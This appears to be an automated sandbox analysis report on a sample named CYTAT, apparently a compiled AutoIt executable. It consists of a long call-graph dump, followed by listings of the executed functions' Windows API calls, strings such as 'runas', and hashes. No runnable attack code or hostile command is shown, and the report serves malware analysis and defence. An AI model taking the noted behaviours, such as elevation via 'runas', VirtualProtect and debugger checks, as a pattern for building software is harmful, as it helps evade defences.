API calls 87970->88448 88450 40ba10 52 API calls 2 library calls 87970->88450 88451 40e270 VariantClear moneypunct 87970->88451 87974->87916 87976->87970 87977 402780 52 API calls 87977->88002 87978->87924 87979 44a801 52 API calls 87979->88002 87981 408f40 VariantClear 88011 40a162 moneypunct _memmove 87981->88011 87982 41130a 51 API calls __cinit 87982->88002 87984 40a11b 87983->87984 87985 42a4b4 VariantClear 87983->87985 87983->88011 87991 40a12d moneypunct 87984->87991 88463 40e270 VariantClear moneypunct 87984->88463 87985->87991 87986 40a780 194 API calls 87986->88002 87987 408e80 VariantClear 87987->88002 87989 401980 53 API calls 87989->88002 87990 4115d7 52 API calls 87990->88011 87991->87990 87991->88011 87992 408e80 VariantClear 87992->88011 87994 42a74d VariantClear 87994->88011 87995 4115d7 52 API calls 87995->88002 87996 40a368 87998 42aad4 87996->87998 88006 40a397 87996->88006 87997 40e270 VariantClear 87997->88011 88466 46fe90 VariantClear VariantClear moneypunct 87998->88466 88460 47390f VariantClear 87999->88460 88000 42a7e4 VariantClear 88000->88011 88001 42a886 VariantClear 88001->88011 88002->87938 88002->87958 88002->87974 88002->87977 88002->87979 88002->87982 88002->87986 88002->87987 88002->87989 88002->87995 88002->87999 88003 409c95 88002->88003 88458 45f508 52 API calls 88002->88458 88459 403e10 53 API calls 88002->88459 88003->86865 88004 40a3ce 88018 40a3d9 moneypunct 88004->88018 88467 40b400 VariantClear VariantClear moneypunct 88004->88467 88006->88004 88030 40a42c moneypunct 88006->88030 88446 40b400 VariantClear VariantClear moneypunct 88006->88446 88009 42abaf 88014 42abd4 VariantClear 88009->88014 88024 40a4ee moneypunct 88009->88024 88010 4115d7 52 API calls 88010->88011 88011->87981 88011->87992 88011->87994 88011->87996 88011->87997 88011->87998 88011->88000 88011->88001 88011->88010 88013 4115d7 52 API calls 88011->88013 88464 470870 52 API calls 88011->88464 88465 44ccf1 VariantClear moneypunct 88011->88465 88012 40a4dc 88012->88024 88469 40e270 VariantClear moneypunct 88012->88469 88015 42a5a6 VariantInit VariantCopy 88013->88015 88014->88024 88015->88011 88020 42a5c6 VariantClear 88015->88020 88016 42ac4f 88025 42ac79 VariantClear 88016->88025 88031 40a546 moneypunct 88016->88031 88019 40a41a 88018->88019 88022 42ab44 VariantClear 88018->88022 88018->88030 88019->88030 88468 40e270 VariantClear moneypunct 88019->88468 88020->88011 88021 40a534 88021->88031 88470 40e270 VariantClear moneypunct 88021->88470 88022->88030 88024->88016 88024->88021 88025->88031 88026 42ad28 88032 42ad4e VariantClear 88026->88032 88037 40a583 moneypunct 88026->88037 88029 40a571 88029->88037 88471 40e270 VariantClear moneypunct 88029->88471 88030->88009 88030->88012 88031->88026 88031->88029 88032->88037 88034 40a650 moneypunct 88034->86865 88035 42ae0e VariantClear 88035->88037 88037->88034 88037->88035 88472 40e270 VariantClear moneypunct 88037->88472 88038->86865 88039->86828 88040->86833 88041->86865 88042->86865 88043->86865 88044->86865 88045->86870 88046->86870 88047->86870 88048->86870 88049->86870 88050->86870 88051->86870 88053 403cdf 88052->88053 88054 408f40 VariantClear 88053->88054 88055 403ce7 88054->88055 88055->86874 88056->86870 88057->86870 88058->86865 88059->86825 88061 408e88 88060->88061 88063 408e94 88060->88063 88062 408f40 VariantClear 88061->88062 88062->88063 88064 45340c 85 API calls 88063->88064 88064->87783 88065->87787 88066->87789 88067->87791 88068->87797 88069->87782 88070->87803 88071->87801 88072->87821 88073->87822 88074->87782 88076 40a7a6 88075->88076 88077 40ae8c 88075->88077 88079 4115d7 52 API calls 88076->88079 88118 41130a 51 API calls __cinit 88077->88118 88115 40a7c6 moneypunct _memmove 88079->88115 88080 40a86d 88081 40abd1 88080->88081 88098 40a878 moneypunct 88080->88098 88123 45e737 90 API calls 3 library calls 88081->88123 88083 401b10 52 API calls 88083->88115 88084 42b791 VariantClear 88084->88115 88085 408e80 VariantClear 88085->88115 88086 4115d7 52 API calls 88086->88115 88087 42ba2d VariantClear 88087->88115 88088 408f40 VariantClear 88088->88098 88089 42b459 VariantClear 88089->88115 88090 40a884 moneypunct 88090->87821 88091 40bc10 53 API calls 88091->88115 88092 408cc0 187 API calls 88092->88115 88094 42b6f6 VariantClear 88094->88115 88095 4530c9 VariantClear 88095->88115 88096 40e270 VariantClear 88096->88115 88097 42bc5b 88097->87821 88098->88088 88098->88090 88099 42bbf5 88124 45e737 90 API calls 3 library calls 88099->88124 88100 42bb6a 88126 44b92d VariantClear 88100->88126 88101 4115d7 52 API calls 88104 42b5b3 VariantInit VariantCopy 88101->88104 88102 40b5f0 89 API calls 88102->88115 88107 42b5d7 VariantClear 88104->88107 88104->88115 88106 408f40 VariantClear 88106->88115 88107->88115 88110 42bc37 88125 45e737 90 API calls 3 library calls 88110->88125 88113 42bc48 88113->88100 88114 408f40 VariantClear 88113->88114 88114->88100 88115->88080 88115->88081 88115->88083 88115->88084 88115->88085 88115->88086 88115->88087 88115->88089 88115->88091 88115->88092 88115->88094 88115->88095 88115->88096 88115->88099 88115->88100 88115->88101 88115->88102 88115->88106 88115->88110 88119 45308a 53 API calls 88115->88119 88120 470870 52 API calls 88115->88120 88121 457f66 87 API calls __write_nolock 88115->88121 88122 472f47 127 API calls 88115->88122 88116->87809 88117->87812 88118->88115 88119->88115 88120->88115 88121->88115 88122->88115 88123->88100 88124->88100 88125->88113 88126->88097 88127->87829 88128->87832 88129->87848 88130->87846 88131->87837 88132->87852 88133->87883 88134->87852 88135->87885 88136->87852 88137->87885 88138->87869 88139->87885 88140->87870 88141->87885 88142->87885 88143->87864 88145 4289d2 88144->88145 88146 408db3 88144->88146 88174 45e737 90 API calls 3 library calls 88145->88174 88172 40bec0 90 API calls 88146->88172 88149 4289e5 88175 45e737 90 API calls 3 library calls 88149->88175 88150 408e5a 88150->87891 88153 428a05 88155 408f40 VariantClear 88153->88155 88154 408dc9 88154->88149 88154->88150 88154->88153 88156 40a780 194 API calls 88154->88156 88157 408e64 88154->88157 88159 408f40 VariantClear 88154->88159 88173 40ba10 52 API calls 2 library calls 88154->88173 88155->88150 88156->88154 88158 408f40 VariantClear 88157->88158 88158->88150 88159->88154 88161 408f40 VariantClear 88160->88161 88162 403d20 88161->88162 88163 403cd0 VariantClear 88162->88163 88164 403d4d 88163->88164 88176 46e91c 88164->88176 88179 467897 88164->88179 88223 45e17d 88164->88223 88233 4755ad 88164->88233 88165 403d76 88165->87888 88165->87899 88170->87888 88171->87890 88172->88154 88173->88154 88174->88149 88175->88153 88236 46e785 88176->88236 88178 46e92f 88178->88165 88180 4678bb 88179->88180 88208 467954 88180->88208 88338 45340c 85 API calls 88180->88338 88181 4115d7 52 API calls 88182 467989 88181->88182 88184 467995 88182->88184 88342 40da60 53 API calls 88182->88342 88189 4533eb 85 API calls 88184->88189 88185 4678f6 88187 413a0e __wsplitpath 46 API calls 88185->88187 88188 4678fc 88187->88188 88191 401b10 52 API calls 88188->88191 88190 4679b7 88189->88190 88192 40de40 60 API calls 88190->88192 88193 46790c 88191->88193 88194 4679c3 88192->88194 88339 40d200 52 API calls 2 library calls 88193->88339 88196 4679c7 GetLastError 88194->88196 88197 467a05 88194->88197 88199 403cd0 VariantClear 88196->88199 88200 467a2c 88197->88200 88201 467a4b 88197->88201 88198 467917 88198->88208 88340 4339fa GetFileAttributesW FindFirstFileW FindClose 88198->88340 88202 4679dc 88199->88202 88204 4115d7 52 API calls 88200->88204 88205 4115d7 52 API calls 88201->88205 88206 4679e6 88202->88206 88212 44ae3e CloseHandle 88202->88212 88210 467a31 88204->88210 88211 467a49 88205->88211 88214 408f40 VariantClear 88206->88214 88207 467928 88207->88208 88213 46792f 88207->88213 88208->88181 88209 467964 88208->88209 88209->88165 88343 436299 52 API calls 2 library calls 88210->88343 88218 408f40 VariantClear 88211->88218 88212->88206 88341 4335cd 56 API calls 3 library calls 88213->88341 88217 4679ed 88214->88217 88217->88165 88220 467a88 88218->88220 88219 467939 88219->88208 88221 408f40 VariantClear 88219->88221 88220->88165 88222 467947 88221->88222 88222->88208 88224 45e198 88223->88224 88225 45e19c 88224->88225 88226 45e1b8 88224->88226 88227 408f40 VariantClear 88225->88227 88228 45e1cc 88226->88228 88229 45e1db FindClose 88226->88229 88230 45e1a4 88227->88230 88231 44ae3e CloseHandle 88228->88231 88232 45e1d9 moneypunct 88228->88232 88229->88232 88230->88165 88231->88232 88232->88165 88344 475077 88233->88344 88235 4755c0 88235->88165 88237 46e7a2 88236->88237 88238 4115d7 52 API calls 88237->88238 88240 46e802 88237->88240 88239 46e7ad 88238->88239 88244 46e7b9 88239->88244 88284 40da60 53 API calls 88239->88284 88241 46e7e5 88240->88241 88245 46e82f 88240->88245 88243 408f40 VariantClear 88241->88243 88247 46e7ea 88243->88247 88285 4533eb 88244->88285 88249 46e8b5 88245->88249 88251 46e845 88245->88251 88247->88178 88277 4680ed 88249->88277 88255 4533eb 85 API calls 88251->88255 88254 46e8bb 88281 443fbe 88254->88281 88264 46e84b 88255->88264 88256 46e7db 88256->88241 88301 44ae3e 88256->88301 88257 46e87a 88304 4689f4 59 API calls 88257->88304 88261 46e883 88263 4013c0 52 API calls 88261->88263 88265 46e88f 88263->88265 88264->88257 88264->88261 88267 40e0a0 52 API calls 88265->88267 88266 408f40 VariantClear 88275 46e881 88266->88275 88268 46e899 88267->88268 88305 40d200 52 API calls 2 library calls 88268->88305 88270 46e911 88270->88178 88271 46e8a5 88306 4689f4 59 API calls 88271->88306 88274 46e903 88276 44ae3e CloseHandle 88274->88276 88275->88270 88307 40da20 88275->88307 88276->88270 88278 468100 88277->88278 88279 4680fa 88277->88279 88278->88254 88311 467ac4 55 API calls 2 library calls 88279->88311 88312 443e36 88281->88312 88283 443fd3 88283->88266 88283->88275 88284->88244 88286 453404 88285->88286 88287 4533f8 88285->88287 88289 40de40 88286->88289 88287->88286 88319 4531b1 85 API calls 5 library calls 88287->88319 88290 40da20 CloseHandle 88289->88290 88291 40de4e 88290->88291 88320 40f110 88291->88320 88294 4264fa 88296 40de84 88329 40e080 SetFilePointerEx SetFilePointerEx 88296->88329 88298 40de8b 88330 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88298->88330 88300 40de90 88300->88245 88300->88256 88302 44ae4b moneypunct 88301->88302 88332 443fdf 88301->88332 88302->88241 88304->88275 88305->88271 88306->88275 88308 40da37 88307->88308 88309 40da29 88307->88309 88308->88309 88310 40da3c CloseHandle 88308->88310 88309->88274 88310->88274 88311->88278 88315 443e19 88312->88315 88316 443e26 88315->88316 88317 443e32 WriteFile 88315->88317 88318 443db4 SetFilePointerEx SetFilePointerEx 88316->88318 88317->88283 88318->88317 88319->88286 88321 40f125 CreateFileW 88320->88321 88322 42630c 88320->88322 88324 40de74 88321->88324 88323 426311 CreateFileW 88322->88323 88322->88324 88323->88324 88325 426337 88323->88325 88324->88294 88328 40dea0 55 API calls moneypunct 88324->88328 88331 40df90 SetFilePointerEx SetFilePointerEx 88325->88331 88327 426342 88327->88324 88328->88296 88329->88298 88330->88300 88331->88327 88333 40da20 CloseHandle 88332->88333 88334 443feb 88333->88334 88337 4340db CloseHandle moneypunct 88334->88337 88336 444001 88336->88302 88337->88336 88338->88185 88339->88198 88340->88207 88341->88219 88342->88184 88343->88211 88345 4533eb 85 API calls 88344->88345 88346 4750b8 88345->88346 88347 4750ee 88346->88347 88348 475129 88346->88348 88350 408f40 VariantClear 88347->88350 88397 4646e0 88348->88397 88355 4750f5 88350->88355 88351 47515e 88352 475162 88351->88352 88390 47518e 88351->88390 88353 408f40 VariantClear 88352->88353 88384 475169 88353->88384 88354 475357 88356 475365 88354->88356 88357 4754ea 88354->88357 88355->88235 88431 44b3ac 57 API calls 88356->88431 88437 464812 92 API calls 88357->88437 88361 4754fc 88362 475374 88361->88362 88363 475508 88361->88363 88410 430d31 88362->88410 88365 408f40 VariantClear 88363->88365 88364 4533eb 85 API calls 88364->88390 88368 47550f 88365->88368 88368->88384 88369 475388 88417 4577e9 88369->88417 88371 47539e 88425 410cfc 88371->88425 88372 475480 88374 408f40 VariantClear 88372->88374 88374->88384 88382 4754b5 88383 408f40 VariantClear 88382->88383 88383->88384 88384->88235 88390->88354 88390->88364 88390->88372 88390->88382 88390->88390 88429 436299 52 API calls 2 library calls 88390->88429 88430 463ad5 64 API calls __wcsicoll 88390->88430 88440 4536f7 53 API calls 88397->88440 88399 4646fc 88441 4426cd 59 API calls _wcslen 88399->88441 88401 464711 88403 40bc70 52 API calls 88401->88403 88409 46474b 88401->88409 88404 46472c 88403->88404 88442 461465 52 API calls _memmove 88404->88442 88406 464741 88407 40c600 52 API calls 88406->88407 88407->88409 88408 464793 88408->88351 88409->88408 88443 463ad5 64 API calls __wcsicoll 88409->88443 88411 430db2 88410->88411 88412 430d54 88410->88412 88411->88369 88413 4115d7 52 API calls 88412->88413 88414 430d74 88413->88414 88415 430da9 88414->88415 88416 4115d7 52 API calls 88414->88416 88415->88369 88416->88414 88418 457a84 88417->88418 88419 45780c _strcat moneypunct _wcslen _wcscpy 88417->88419 88418->88371 88419->88418 88420 443006 57 API calls 88419->88420 88422 4135bb 46 API calls _malloc 88419->88422 88423 45340c 85 API calls 88419->88423 88424 40f6f0 54 API calls 88419->88424 88444 44b3ac 57 API calls 88419->88444 88420->88419 88422->88419 88423->88419 88424->88419 88427 410d11 88425->88427 88426 410da9 VirtualProtect 88427->88426 88429->88390 88430->88390 88431->88362 88437->88361 88440->88399 88441->88401 88442->88406 88443->88408 88444->88419 88445->87907 88446->88004 88447->87922 88448->87970 88449->88034 88450->87970 88451->87970 88452->87940 88453->87967 88454->87932 88455->87936 88456->87941 88457->88002 88458->88002 88459->88002 88460->87958 88461->87978 88462->87960 88463->87991 88464->88011 88465->88011 88466->88004 88467->88018 88468->88030 88469->88024 88470->88031 88471->88037 88472->88037 88473->87978 88474->87927 88475 42d154 88479 480a8d 88475->88479 88477 42d161 88478 480a8d 194 API calls 88477->88478 88478->88477 88480 480ae4 88479->88480 88481 480b26 88479->88481 88483 480aeb 88480->88483 88484 480b15 88480->88484 88482 40bc70 52 API calls 88481->88482 88494 480b2e 88482->88494 88486 480aee 88483->88486 88487 480b04 88483->88487 88512 4805bf 194 API calls 88484->88512 88486->88481 88489 480af3 88486->88489 88511 47fea2 194 API calls __itow_s 88487->88511 88510 47f135 194 API calls 88489->88510 88491 40e0a0 52 API calls 88491->88494 88493 408f40 VariantClear 88496 481156 88493->88496 88494->88491 88495 480aff 88494->88495 88499 40e710 53 API calls 88494->88499 88500 401980 53 API calls 88494->88500 88502 40c2c0 52 API calls 88494->88502 88503 480ff5 88494->88503 88504 408e80 VariantClear 88494->88504 88505 40a780 194 API calls 88494->88505 88513 45377f 52 API calls 88494->88513 88514 45e951 53 API calls 88494->88514 88515 40e830 53 API calls 88494->88515 88516 47925f 53 API calls 88494->88516 88517 47fcff 194 API calls 88494->88517 88495->88493 88497 408f40 VariantClear 88496->88497 88498 48115e 88497->88498 88498->88477 88499->88494 88500->88494 88502->88494 88518 45e737 90 API calls 3 library calls 88503->88518 88504->88494 88505->88494 88510->88495 88511->88495 88512->88495 88513->88494 88514->88494 88515->88494 88516->88494 88517->88494 88518->88495 88519 42b14b 88526 40bc10 88519->88526 88521 42b159 88522 4096a0 331 API calls 88521->88522 88523 42b177 88522->88523 88537 44b92d VariantClear 88523->88537 88525 42bc5b 88527 40bc24 88526->88527 88528 40bc17 88526->88528 88530 40bc2a 88527->88530 88531 40bc3c 88527->88531 88529 408e80 VariantClear 88528->88529 88532 40bc1f 88529->88532 88533 408e80 VariantClear 88530->88533 88534 4115d7 52 API calls 88531->88534 88532->88521 88535 40bc33 88533->88535 88536 40bc43 88534->88536 88535->88521 88536->88521 88537->88525 88538 425b2b 88543 40f000 88538->88543 88542 425b3a 88544 4115d7 52 API calls 88543->88544 88545 40f007 88544->88545 88546 4276ea 88545->88546 88552 40f030 88545->88552 88551 41130a 51 API calls __cinit 88551->88542 88553 40f039 88552->88553 88555 40f01a 88552->88555 88582 41130a 51 API calls __cinit 88553->88582 88556 40e500 88555->88556 88557 40bc70 52 API calls 88556->88557 88558 40e515 GetVersionExW 88557->88558 88559 402160 52 API calls 88558->88559 88560 40e557 88559->88560 88583 40e660 88560->88583 88567 427674 88570 4276c6 GetSystemInfo 88567->88570 88568 40e5e0 88572 4276d5 GetSystemInfo 88568->88572 88597 40efd0 88568->88597 88569 40e5cd GetCurrentProcess 88604 40ef20 LoadLibraryA GetProcAddress 88569->88604 88570->88572 88575 40e629 88601 40ef90 88575->88601 88578 40e641 FreeLibrary 88579 40e644 88578->88579 88580 40e653 FreeLibrary 88579->88580 88581 40e656 88579->88581 88580->88581 88581->88551 88582->88555 88584 40e667 88583->88584 88585 42761d 88584->88585 88586 40c600 52 API calls 88584->88586 88587 40e55c 88586->88587 88588 40e680 88587->88588 88589 40e687 88588->88589 88590 427616 88589->88590 88591 40c600 52 API calls 88589->88591 88592 40e566 88591->88592 88592->88567 88593 40ef60 88592->88593 88594 40e5c8 88593->88594 88595 40ef66 LoadLibraryA 88593->88595 88594->88568 88594->88569 88595->88594 88596 40ef77 GetProcAddress 88595->88596 88596->88594 88598 40e620 88597->88598 88599 40efd6 LoadLibraryA 88597->88599 88598->88570 88598->88575 88599->88598 88600 40efe7 GetProcAddress 88599->88600 88600->88598 88605 40efb0 LoadLibraryA GetProcAddress 88601->88605 88603 40e632 GetNativeSystemInfo 88603->88578 88603->88579 88604->88568 88605->88603 88606 3fc14f0 88620 3fbf140 88606->88620 88608 3fc15ae 88623 3fc13e0 88608->88623 88626 3fc25e0 GetPEB 88620->88626 88622 3fbf7cb 88622->88608 88624 3fc13e9 Sleep 88623->88624 88625 3fc13f7 88624->88625 88627 3fc260a 88626->88627 88627->88622 88628 425b5e 88633 40c7f0 88628->88633 88632 425b6d 88668 40db10 52 API calls 88633->88668 88635 40c82a 88669 410ab0 6 API calls 88635->88669 88637 40c86d 88638 40bc70 52 API calls 88637->88638 88639 40c877 88638->88639 88640 40bc70 52 API calls 88639->88640 88641 40c881 88640->88641 88642 40bc70 52 API calls 88641->88642 88643 40c88b 88642->88643 88644 40bc70 52 API calls 88643->88644 88645 40c8d1 88644->88645 88646 40bc70 52 API calls 88645->88646 88647 40c991 88646->88647 88670 40d2c0 52 API calls 88647->88670 88649 40c99b 88671 40d0d0 53 API calls 88649->88671 88651 40c9c1 88652 40bc70 52 API calls 88651->88652 88653 40c9cb 88652->88653 88672 40e310 53 API calls 88653->88672 88655 40ca28 88656 408f40 VariantClear 88655->88656 88657 40ca30 88656->88657 88658 408f40 VariantClear 88657->88658 88659 40ca38 GetStdHandle 88658->88659 88660 429630 88659->88660 88661 40ca87 88659->88661 88660->88661 88662 429639 88660->88662 88667 41130a 51 API calls __cinit 88661->88667 88673 4432c0 57 API calls 88662->88673 88664 429641 88674 44b6ab CreateThread 88664->88674 88666 42964f CloseHandle 88666->88661 88667->88632 88668->88635 88669->88637 88670->88649 88671->88651 88672->88655 88673->88664 88674->88666 88675 44b5cb 58 API calls 88674->88675 88676 425b6f 88681 40dc90 88676->88681 88680 425b7e 88682 40bc70 52 API calls 88681->88682 88683 40dd03 88682->88683 88689 40f210 88683->88689 88686 40dd96 88687 40ddb7 88686->88687 88692 40dc00 52 API calls 2 library calls 88686->88692 88688 41130a 51 API calls __cinit 88687->88688 88688->88680 88693 40f250 RegOpenKeyExW 88689->88693 88691 40f230 88691->88686 88692->88686 88694 425e17 88693->88694 88695 40f275 RegQueryValueExW 88693->88695 88694->88691 88696 40f2c3 RegCloseKey 88695->88696 88697 40f298 88695->88697 88696->88691 88698 40f2a9 RegCloseKey 88697->88698 88699 425e1d 88697->88699 88698->88691

                                                Executed Functions

                                                Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 004096C1
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _memmove.LIBCMT ref: 0040970C
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                • _memmove.LIBCMT ref: 00409D96
                                                • _memmove.LIBCMT ref: 0040A6C4
                                                • _memmove.LIBCMT ref: 004297E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                • String ID:
                                                • API String ID: 2383988440-0
                                                • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                Strings
                                                • runas, xrefs: 0042E2AD, 0042E2DC
                                                • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                • API String ID: 2495805114-3383388033
                                                • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1921 427693-427696 1915->1921 1922 427688-427691 1915->1922 1920 4276b4-4276be 1916->1920 1923 427625-427629 1917->1923 1924 40e59c-40e59f 1917->1924 1931 40e5ec-40e60c 1918->1931 1932 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1932 1933 4276c6-4276ca GetSystemInfo 1920->1933 1921->1920 1930 427698-4276a8 1921->1930 1922->1920 1926 427636-427640 1923->1926 1927 42762b-427631 1923->1927 1928 40e5a5-40e5ae 1924->1928 1929 427654-427657 1924->1929 1926->1918 1927->1918 1935 40e5b4 1928->1935 1936 427645-42764f 1928->1936 1929->1918 1934 42765d-42766f 1929->1934 1937 4276b0 1930->1937 1938 4276aa-4276ae 1930->1938 1940 40e612-40e623 call 40efd0 1931->1940 1941 4276d5-4276df GetSystemInfo 1931->1941 1932->1931 1947 40e5e8 1932->1947 1933->1941 1934->1918 1935->1918 1936->1918 1937->1920 1938->1920 1940->1933 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1931 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
